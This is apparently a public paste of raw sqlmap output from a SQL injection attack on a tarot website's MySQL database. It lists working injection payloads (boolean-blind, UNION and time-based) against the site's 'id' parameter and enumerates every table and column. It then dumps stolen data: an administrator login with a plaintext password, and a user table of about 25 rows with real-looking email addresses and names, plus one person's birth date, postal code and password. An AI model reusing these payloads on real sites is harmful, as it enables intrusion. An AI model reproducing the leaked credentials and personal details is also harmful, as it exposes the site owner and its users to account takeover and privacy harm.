API tools faq
paste
Guest User

Untitled

a guest
Jun 30th, 2018
248
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 20.69 KB | None | 0 0
raw download clone embed print report
  1. sqlmap identified the following injection points with a total of 39 HTTP(s) requests:
  2. ---
  3. Place: GET
  4. Parameter: id
  5. Type: boolean-based blind
  6. Title: AND boolean-based blind - WHERE or HAVING clause
  7. Payload: id=4788 AND 461=461
  8.  
  9. Type: UNION query
  10. Title: MySQL UNION query (NULL) - 1 to 10 columns
  11. Payload: id=-8791 UNION ALL SELECT NULL, CONCAT(CHAR(58,120,108,102,58),IFNULL(CAST(CHAR(111,75,106,73,78,110,75,109,65,89) AS CHAR),CHAR(32)),CHAR(58,116,109,105,58)), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
  12.  
  13. Type: AND/OR time-based blind
  14. Title: MySQL > 5.0.11 AND time-based blind
  15. Payload: id=4788 AND SLEEP(5)
  16. ---
  17.  
  18. banner: '5.1.56-log'
  19.  
  20. current user: 'gruponbs_tarotyf@localhost'
  21.  
  22. current database: 'gruponbs_tarotyf'
  23.  
  24. current user is DBA: 'False'
  25.  
  26. available databases [2]:
  27. [*] gruponbs_tarotyf
  28. [*] information_schema
  29.  
  30. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  31. ---
  32. Place: GET
  33. Parameter: id
  34. Type: boolean-based blind
  35. Title: AND boolean-based blind - WHERE or HAVING clause
  36. Payload: id=4788 AND 461=461
  37.  
  38. Type: UNION query
  39. Title: MySQL UNION query (NULL) - 1 to 10 columns
  40. Payload: id=-8791 UNION ALL SELECT NULL, CONCAT(CHAR(58,120,108,102,58),IFNULL(CAST(CHAR(111,75,106,73,78,110,75,109,65,89) AS CHAR),CHAR(32)),CHAR(58,116,109,105,58)), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
  41.  
  42. Type: AND/OR time-based blind
  43. Title: MySQL > 5.0.11 AND time-based blind
  44. Payload: id=4788 AND SLEEP(5)
  45. ---
  46.  
  47. Database: gruponbs_tarotyf
  48. [23 tables]
  49. +------------------------+
  50. | addserver |
  51. | admin |
  52. | ciberteca_categorias |
  53. | ciberteca_docs |
  54. | ciberteca_links |
  55. | ciberteca_pg |
  56. | clientes |
  57. | configuracion |
  58. | contenidos |
  59. | directorio |
  60. | directorio_categorias |
  61. | encuestas |
  62. | enlaces |
  63. | imagen_addserver |
  64. | modulos_predefinidos |
  65. | noticias |
  66. | pd_categoria_productos |
  67. | productos |
  68. | servicios |
  69. | tags |
  70. | tittle |
  71. | usuarios |
  72. | visitas |
  73. +------------------------+
  74.  
  75. Database: gruponbs_tarotyf
  76. Table: encuestas
  77. [17 columns]
  78. +-------------+-----------+
  79. | Column | Type |
  80. +-------------+-----------+
  81. | cont1 | int(5) |
  82. | cont2 | int(5) |
  83. | cont3 | int(5) |
  84. | cont4 | int(5) |
  85. | cont5 | int(5) |
  86. | cont6 | int(5) |
  87. | estado | int(1) |
  88. | fecha | char(10) |
  89. | id_encuesta | int(5) |
  90. | orden | int(5) |
  91. | pregunta | char(255) |
  92. | respuesta1 | char(255) |
  93. | respuesta2 | char(255) |
  94. | respuesta3 | char(255) |
  95. | respuesta4 | char(255) |
  96. | respuesta5 | char(255) |
  97. | respuesta6 | char(255) |
  98. +-------------+-----------+
  99.  
  100. Database: gruponbs_tarotyf
  101. Table: directorio
  102. [9 columns]
  103. +-------------+--------------+
  104. | Column | Type |
  105. +-------------+--------------+
  106. | categoria | int(11) |
  107. | descripcion | longtext |
  108. | destacado | int(1) |
  109. | email | varchar(255) |
  110. | estado | int(1) |
  111. | id | int(11) |
  112. | logo | varchar(255) |
  113. | nombre | varchar(255) |
  114. | web | varchar(255) |
  115. +-------------+--------------+
  116.  
  117. Database: gruponbs_tarotyf
  118. Table: addserver
  119. [14 columns]
  120. +---------------+--------------+
  121. | Column | Type |
  122. +---------------+--------------+
  123. | add_codi | longtext |
  124. | clicks | int(10) |
  125. | estado | int(1) |
  126. | id_addserver | int(5) |
  127. | id_cliente | int(5) |
  128. | id_modulo | int(5) |
  129. | id_portal | int(5) |
  130. | imagen | varchar(100) |
  131. | nombre | varchar(100) |
  132. | redireccion | varchar(250) |
  133. | sesion | int(1) |
  134. | tipo | int(1) |
  135. | ventana_nueva | int(1) |
  136. | vistas | int(10) |
  137. +---------------+--------------+
  138.  
  139. Database: gruponbs_tarotyf
  140. Table: servicios
  141. [9 columns]
  142. +----------------+--------------+
  143. | Column | Type |
  144. +----------------+--------------+
  145. | estado | int(1) |
  146. | id_servicio | int(5) |
  147. | imagen | varchar(255) |
  148. | orden | int(5) |
  149. | redireccion | varchar(255) |
  150. | texto | varchar(255) |
  151. | texto_ampliado | longtext |
  152. | titulo | varchar(255) |
  153. | visitas | int(10) |
  154. +----------------+--------------+
  155.  
  156. Database: gruponbs_tarotyf
  157. Table: pd_categoria_productos
  158. [4 columns]
  159. +--------+--------------+
  160. | Column | Type |
  161. +--------+--------------+
  162. | estado | int(1) |
  163. | id | int(5) |
  164. | orden | int(5) |
  165. | valor | varchar(255) |
  166. +--------+--------------+
  167.  
  168. Database: gruponbs_tarotyf
  169. Table: clientes
  170. [9 columns]
  171. +------------+-----------+
  172. | Column | Type |
  173. +------------+-----------+
  174. | contacto | char(255) |
  175. | email | char(255) |
  176. | estado | int(1) |
  177. | id_cliente | int(5) |
  178. | id_portal | int(5) |
  179. | nombre | char(255) |
  180. | texto | char(255) |
  181. | tlf | char(50) |
  182. | web | char(255) |
  183. +------------+-----------+
  184.  
  185. Database: gruponbs_tarotyf
  186. Table: ciberteca_links
  187. [7 columns]
  188. +--------------+--------------+
  189. | Column | Type |
  190. +--------------+--------------+
  191. | estado | int(1) |
  192. | id_categoria | int(5) |
  193. | id_ciberteca | int(5) |
  194. | orden | int(5) |
  195. | redireccion | varchar(255) |
  196. | texto | longtext |
  197. | titulo | varchar(255) |
  198. +--------------+--------------+
  199.  
  200. Database: gruponbs_tarotyf
  201. Table: contenidos
  202. [3 columns]
  203. +--------------+--------------+
  204. | Column | Type |
  205. +--------------+--------------+
  206. | contenido | text |
  207. | id_contenido | int(11) |
  208. | nombre | varchar(255) |
  209. +--------------+--------------+
  210.  
  211. Database: gruponbs_tarotyf
  212. Table: ciberteca_docs
  213. [9 columns]
  214. +--------------+--------------+
  215. | Column | Type |
  216. +--------------+--------------+
  217. | autor | varchar(255) |
  218. | estado | int(1) |
  219. | fecha | varchar(255) |
  220. | id_categoria | int(5) |
  221. | id_ciberteca | int(5) |
  222. | imagen | varchar(255) |
  223. | orden | int(5) |
  224. | texto | longtext |
  225. | titulo | varchar(255) |
  226. +--------------+--------------+
  227.  
  228. Database: gruponbs_tarotyf
  229. Table: modulos_predefinidos
  230. [6 columns]
  231. +-----------------------+--------------+
  232. | Column | Type |
  233. +-----------------------+--------------+
  234. | banner | int(1) |
  235. | codi | longtext |
  236. | estado | int(1) |
  237. | id_modulo_predefinido | int(5) |
  238. | nombre | varchar(100) |
  239. | posicion | int(1) |
  240. +-----------------------+--------------+
  241.  
  242. Database: gruponbs_tarotyf
  243. Table: tittle
  244. [2 columns]
  245. +--------+----------+
  246. | Column | Type |
  247. +--------+----------+
  248. | id | int(5) |
  249. | texto | longtext |
  250. +--------+----------+
  251.  
  252. Database: gruponbs_tarotyf
  253. Table: enlaces
  254. [6 columns]
  255. +-------------+--------------+
  256. | Column | Type |
  257. +-------------+--------------+
  258. | estado | int(1) |
  259. | id_enlace | int(5) |
  260. | orden | int(5) |
  261. | redireccion | varchar(255) |
  262. | texto | varchar(255) |
  263. | visitas | int(10) |
  264. +-------------+--------------+
  265.  
  266. Database: gruponbs_tarotyf
  267. Table: tags
  268. [2 columns]
  269. +--------+----------+
  270. | Column | Type |
  271. +--------+----------+
  272. | id | int(5) |
  273. | texto | longtext |
  274. +--------+----------+
  275.  
  276. Database: gruponbs_tarotyf
  277. Table: directorio_categorias
  278. [4 columns]
  279. +--------+--------------+
  280. | Column | Type |
  281. +--------+--------------+
  282. | estado | int(1) |
  283. | id | int(11) |
  284. | orden | int(11) |
  285. | titulo | varchar(255) |
  286. +--------+--------------+
  287.  
  288. Database: gruponbs_tarotyf
  289. Table: configuracion
  290. [20 columns]
  291. +----------------+--------------+
  292. | Column | Type |
  293. +----------------+--------------+
  294. | color_fondo | varchar(255) |
  295. | dir_web | varchar(255) |
  296. | directorio | int(1) |
  297. | email_contacto | varchar(255) |
  298. | email_editor | varchar(255) |
  299. | encuesta | int(1) |
  300. | enlaces | int(1) |
  301. | id | int(11) |
  302. | imagen | varchar(255) |
  303. | link_pie | varchar(255) |
  304. | nombre_web | varchar(255) |
  305. | noticias | int(1) |
  306. | pie | varchar(255) |
  307. | pie2 | varchar(255) |
  308. | publicidad | int(1) |
  309. | secciones | int(1) |
  310. | servicios | int(1) |
  311. | texto_home | longtext |
  312. | titulo | varchar(255) |
  313. | tlf_contacto | varchar(255) |
  314. +----------------+--------------+
  315.  
  316. Database: gruponbs_tarotyf
  317. Table: productos
  318. [10 columns]
  319. +----------------+--------------+
  320. | Column | Type |
  321. +----------------+--------------+
  322. | estado | int(1) |
  323. | id_categoria | int(1) |
  324. | id_producto | int(5) |
  325. | imagen | varchar(255) |
  326. | orden | int(5) |
  327. | redireccion | varchar(255) |
  328. | texto | varchar(255) |
  329. | texto_ampliado | longtext |
  330. | titulo | varchar(255) |
  331. | visitas | int(10) |
  332. +----------------+--------------+
  333.  
  334. Database: gruponbs_tarotyf
  335. Table: usuarios
  336. [14 columns]
  337. +------------------+--------------+
  338. | Column | Type |
  339. +------------------+--------------+
  340. | apellidos | varchar(255) |
  341. | codigo_postal | varchar(255) |
  342. | email | varchar(255) |
  343. | estado | int(1) |
  344. | fecha | varchar(10) |
  345. | fecha_nacimiento | varchar(255) |
  346. | hora | varchar(10) |
  347. | id_usuario | int(6) |
  348. | nombre | varchar(255) |
  349. | orden | int(8) |
  350. | pwd | varchar(255) |
  351. | sexo | varchar(255) |
  352. | telefono | varchar(255) |
  353. | usuario | varchar(255) |
  354. +------------------+--------------+
  355.  
  356. Database: gruponbs_tarotyf
  357. Table: visitas
  358. [2 columns]
  359. +----------+---------+
  360. | Column | Type |
  361. +----------+---------+
  362. | contador | int(11) |
  363. | id | int(1) |
  364. +----------+---------+
  365.  
  366. Database: gruponbs_tarotyf
  367. Table: noticias
  368. [9 columns]
  369. +----------------+--------------+
  370. | Column | Type |
  371. +----------------+--------------+
  372. | estado | int(1) |
  373. | id_noticia | int(5) |
  374. | imagen | varchar(255) |
  375. | orden | int(5) |
  376. | redireccion | varchar(255) |
  377. | texto | varchar(255) |
  378. | texto_ampliado | longtext |
  379. | titulo | varchar(255) |
  380. | visitas | int(10) |
  381. +----------------+--------------+
  382.  
  383. Database: gruponbs_tarotyf
  384. Table: admin
  385. [3 columns]
  386. +----------+--------------+
  387. | Column | Type |
  388. +----------+--------------+
  389. | admin | varchar(255) |
  390. | id_admin | int(3) |
  391. | pass | varchar(255) |
  392. +----------+--------------+
  393.  
  394. Database: gruponbs_tarotyf
  395. Table: ciberteca_categorias
  396. [5 columns]
  397. +-----------+--------------+
  398. | Column | Type |
  399. +-----------+--------------+
  400. | categoria | varchar(255) |
  401. | estado | int(1) |
  402. | id | int(5) |
  403. | id_portal | int(5) |
  404. | orden | int(5) |
  405. +-----------+--------------+
  406.  
  407. Database: gruponbs_tarotyf
  408. Table: imagen_addserver
  409. [2 columns]
  410. +--------+--------------+
  411. | Column | Type |
  412. +--------+--------------+
  413. | id | int(5) |
  414. | valor | varchar(200) |
  415. +--------+--------------+
  416.  
  417. Database: gruponbs_tarotyf
  418. Table: ciberteca_pg
  419. [4 columns]
  420. +--------------+----------+
  421. | Column | Type |
  422. +--------------+----------+
  423. | id | int(5) |
  424. | id_ciberteca | int(5) |
  425. | orden | int(5) |
  426. | texto | longtext |
  427. +--------------+----------+
  428.  
  429. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  430. ---
  431. Place: GET
  432. Parameter: id
  433. Type: boolean-based blind
  434. Title: AND boolean-based blind - WHERE or HAVING clause
  435. Payload: id=4788 AND 461=461
  436.  
  437. Type: UNION query
  438. Title: MySQL UNION query (NULL) - 1 to 10 columns
  439. Payload: id=-8791 UNION ALL SELECT NULL, CONCAT(CHAR(58,120,108,102,58),IFNULL(CAST(CHAR(111,75,106,73,78,110,75,109,65,89) AS CHAR),CHAR(32)),CHAR(58,116,109,105,58)), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
  440.  
  441. Type: AND/OR time-based blind
  442. Title: MySQL > 5.0.11 AND time-based blind
  443. Payload: id=4788 AND SLEEP(5)
  444. ---
  445.  
  446. Database: gruponbs_tarotyf
  447. Table: admin
  448. [3 columns]
  449. +----------+--------------+
  450. | Column | Type |
  451. +----------+--------------+
  452. | admin | varchar(255) |
  453. | id_admin | int(3) |
  454. | pass | varchar(255) |
  455. +----------+--------------+
  456.  
  457. Database: gruponbs_tarotyf
  458. Table: admin
  459. [1 entry]
  460. +--------------+----------+-----------+
  461. | admin | id_admin | pass |
  462. +--------------+----------+-----------+
  463. | tarotyfuturo | 2 | CLAU0056r |
  464. +--------------+----------+-----------+
  465.  
  466. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  467. ---
  468. Place: GET
  469. Parameter: id
  470. Type: boolean-based blind
  471. Title: AND boolean-based blind - WHERE or HAVING clause
  472. Payload: id=4788 AND 461=461
  473.  
  474. Type: UNION query
  475. Title: MySQL UNION query (NULL) - 1 to 10 columns
  476. Payload: id=-8791 UNION ALL SELECT NULL, CONCAT(CHAR(58,120,108,102,58),IFNULL(CAST(CHAR(111,75,106,73,78,110,75,109,65,89) AS CHAR),CHAR(32)),CHAR(58,116,109,105,58)), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
  477.  
  478. Type: AND/OR time-based blind
  479. Title: MySQL > 5.0.11 AND time-based blind
  480. Payload: id=4788 AND SLEEP(5)
  481. ---
  482.  
  483. Database: gruponbs_tarotyf
  484. Table: usuarios
  485. [14 columns]
  486. +------------------+--------------+
  487. | Column | Type |
  488. +------------------+--------------+
  489. | apellidos | varchar(255) |
  490. | codigo_postal | varchar(255) |
  491. | email | varchar(255) |
  492. | estado | int(1) |
  493. | fecha | varchar(10) |
  494. | fecha_nacimiento | varchar(255) |
  495. | hora | varchar(10) |
  496. | id_usuario | int(6) |
  497. | nombre | varchar(255) |
  498. | orden | int(8) |
  499. | pwd | varchar(255) |
  500. | sexo | varchar(255) |
  501. | telefono | varchar(255) |
  502. | usuario | varchar(255) |
  503. +------------------+--------------+
  504.  
  505. Database: gruponbs_tarotyf
  506. Table: usuarios
  507. [25 entries]
  508. +-----------+---------------+-----------------------------------------------+--------+------------+------------------+------+------------+--------------------------------+-------+--------+------+----------+----------+
  509. | apellidos | codigo_postal | email | estado | fecha | fecha_nacimiento | hora | id_usuario | nombre | orden | pwd | sexo | telefono | usuario |
  510. +-----------+---------------+-----------------------------------------------+--------+------------+------------------+------+------------+--------------------------------+-------+--------+------+----------+----------+
  511. | NULL | NULL | NULL | 1 | 8-4-2011 | NULL | NULL | 31 | NULL | NULL | NULL | 1 | NULL | NULL |
  512. | NULL | NULL | provdaincegjk@gmail.com | 1 | 5-11-2011 | NULL | NULL | 37 | galleymmerymn | NULL | NULL | 1 | NULL | NULL |
  513. | NULL | NULL | aleprezentrt@gmail.com | 1 | 27-1-2012 | NULL | NULL | 46 | Sheerenty | NULL | NULL | 1 | NULL | NULL |
  514. | NULL | NULL | egipto1962@hotmail.com | 1 | 12-10-2010 | NULL | NULL | 24 | encarna | NULL | NULL | 1 | NULL | NULL |
  515. | NULL | NULL | hashimmeble@gmail.com | 1 | 12-2-2012 | NULL | NULL | 48 | RitRainiDiala | NULL | NULL | 1 | NULL | NULL |
  516. | NULL | NULL | feriomas3l@gmail.com | 1 | 16-1-2012 | NULL | NULL | 44 | aspellproossy | NULL | NULL | 1 | NULL | NULL |
  517. | NULL | NULL | bainbridgedol@gmail.com | 1 | 11-10-2011 | NULL | NULL | 33 | balgratrild | NULL | NULL | 1 | NULL | NULL |
  518. | NULL | NULL | veiekr@siywqd.com | 1 | 29-11-2011 | NULL | NULL | 38 | gjhoyop | NULL | NULL | 1 | NULL | NULL |
  519. | NULL | NULL | jaysteperson199@gmail.com | 1 | 26-12-2011 | NULL | NULL | 41 | search engine ranking software | NULL | NULL | 1 | NULL | NULL |
  520. | NULL | NULL | mcbona@halconviajes.com | 1 | 3-12-2008 | NULL | NULL | 1 | MARI CARMEN BONAFUENTE | NULL | NULL | 1 | NULL | NULL |
  521. | NULL | NULL | mhtkmooedkibgkmooesd@rbakmooekkwwjkmooeem.com | 1 | 13-10-2011 | NULL | NULL | 34 | behkmooesd | NULL | NULL | 1 | NULL | NULL |
  522. | NULL | NULL | mjtapiacedeno@gmail.com | 1 | 2-12-2009 | NULL | NULL | 6 | maria johana tapia | NULL | NULL | 1 | NULL | NULL |
  523. | NULL | NULL | NAVARO04@HOTMAIL.COM | 1 | 9-5-2010 | NULL | NULL | 8 | MAXIMO NAVARRO FONS | NULL | NULL | 1 | NULL | NULL |
  524. | NULL | NULL | rqwcrt@pdooti.com | 1 | 29-1-2012 | NULL | NULL | 47 | kxrvplbiq | NULL | NULL | 1 | NULL | NULL |
  525. | NULL | NULL | vizcayanv1@hotmail.com | 1 | 16-5-2010 | NULL | NULL | 10 | NILDA VIZCAYA | NULL | NULL | 1 | NULL | NULL |
  526. | NULL | NULL | olaurablois1@gmail.com | 1 | 27-6-2009 | NULL | NULL | 3 | laura | NULL | NULL | 1 | NULL | NULL |
  527. | NULL | NULL | jsiign@fxgtia.com | 1 | 7-12-2011 | NULL | NULL | 39 | bfmhpuhquwf | NULL | NULL | 1 | NULL | NULL |
  528. | NULL | NULL | blakewaykagor@gmail.com | 1 | 7-10-2011 | NULL | NULL | 32 | Kemgrirehix | NULL | NULL | 1 | NULL | NULL |
  529. | NULL | NULL | fertymertykerty@mail.com | 1 | 26-10-2011 | NULL | NULL | 36 | shoopsype | NULL | NULL | 1 | NULL | NULL |
  530. | NULL | NULL | kylerz@wihhre.com | 1 | 26-12-2011 | NULL | NULL | 40 | qrzvqpjkshf | NULL | NULL | 1 | NULL | NULL |
  531. | NULL | NULL | myfirsttopic@titkinaq.info | 1 | 8-1-2012 | NULL | NULL | 43 | kixStaila | NULL | NULL | 1 | NULL | NULL |
  532. | NULL | NULL | ezhkmooert@uxvkmooeal.com | 1 | 23-1-2012 | NULL | NULL | 45 | QatriNNko | NULL | NULL | 1 | NULL | NULL |
  533. | babiano | 08330 | ebortega@gmail.com | 1 | NULL | 05/08/1969 | NULL | 12 | Eloy | NULL | ebotek | 1 | NULL | ebortega |
  534. | NULL | NULL | sexmserwisy@gmail.com | 1 | 31-12-2011 | NULL | NULL | 42 | peerlySen | NULL | NULL | 1 | NULL | NULL |
  535. | NULL | NULL | ba.inbridgedol@gmail.com | 1 | 17-10-2011 | NULL | NULL | 35 | occapaste | NULL | NULL | 1 | NULL | NULL |
  536. +-----------+---------------+-----------------------------------------------+--------+------------+------------------+------+------------+--------------------------------+-------+--------+------+----------+----------+
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!